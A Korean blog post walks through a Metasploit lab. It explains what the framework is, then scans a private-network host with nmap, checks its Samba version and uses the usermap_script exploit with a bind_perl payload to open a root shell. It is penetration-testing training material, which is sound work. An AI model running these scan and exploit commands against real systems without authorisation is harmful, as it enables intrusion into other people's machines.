처음 만나는 클라우드 보안

Metasploit를 활용한 시스템 해킹 실습 본문

정보보안

Metasploit를 활용한 시스템 해킹 실습

영민하게 2022. 5. 3. 17:52
반응형

Metasploit란?

H.D Morre에 의해 개발된 테스트 목적용 시스템 해킹 framework를 말한다. 처음엔 Moore에 의해 Perl로 작성되었지만, Rapid7에 의해 인수 된 후 Ruby로 재구조화 되어 공격모듈의 확장자는 .rb이다. Window, Linux버전이 제공되며 공격 모듈을 모두 악성코드로 인식하는 Window에서는 설치시 동작에 장애가 발생한다. 반면, Kali Linux에 설치 된 Matasploit의 활용은 매우 간편하다.

 

Matasploit 실행 (Kali Linux)

: 첫 실행시 DB생성 및 사용자 등록 과정이 필요하며 이후의 과정은 'sudo  msfconsole' 명령어로 실행 가능하다.

첫실행시:  시작메뉴 => 08 Exploitation tools => Metasploit framwork => DB생성 및 시작

Matasploit 구동화면: 사용가능한 exploits scipts가 2196개라는 메세지가 하단에 나타난다.

실습 순서

: Metasploit를 활용한 침투는 크게 4단계로 나눌 수 있다. 

1단계 - nmap이용해 공격대상의 취약포트를 찾는다. 버전

2단계  - 스크립트를 이용해서 진짜 그 취약점이 존재하는지 확인

3단계 - 구글에서 관련 취약점 검색, Metasploit에서 사용할 스크립트를 찾는다.

4단계 - Metasploit에서 Exploit를 실행하여 결과를 확인한다.

 

1단계 포트 스캔

nmap이용해서 버전 스캔, All 스캔  =>침투 가능한 취약 포트를 찾는다.

 

sudo  nmap  -sV  192.168.5.130

139번, 445번 Samba 열린포트 확인

sudo  nmap  -A  192.168.5.130  -p 139      // 타겟 139번 포트 집중스캔         

버전 확인이 가능하다.

2단계 스크립트 확인

: 스크립트를 이용해서 취약점의 존재여부를 확인한다.

nmap에서 관련 script 확인

sudo find / -name "samba-vuln-cve-2012-1182.nse"

 

3단계 정보수집

: 구글에 해당 취약점 smbd 3.0.20-Debian 관련 정보를 수집한다. Metasploit모듈과 명령어 확인이 가능하다.해보면

Rapid7에서 관련 모듈에 대한 명령어를 제공한다 (출처 - https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/)

 

4단계 Exploit

msf6 > search usermap_script

msf6 > use  exploit/multi/samba/usermap_script  //구글링 결과와 일치

msf6 > info                                                  //스크립트 내용 확인

Required란에 yes라고 표기된 속성값들은 exploit를 위한 필수값이다.

msf6 > set rhost 192.168.5.130

msf6 > show payloads                                   //exploit이후 사용할 통신방법을 선택한다.

set payload cmd/unix/bind_perl                       //bind_perl 하나를 임의로 지정해주었다.

msf6 > exploit                                            //exploit 수행

 

(비정상) 계정이 daemon으로 나타난다. Metasploit를 root권한으로 실행했는지 다시 확인해 본다.
(정상) sudo msfconsole 명령어로 수행, 활동 계정이 root로 확인된다.

반응형
Comments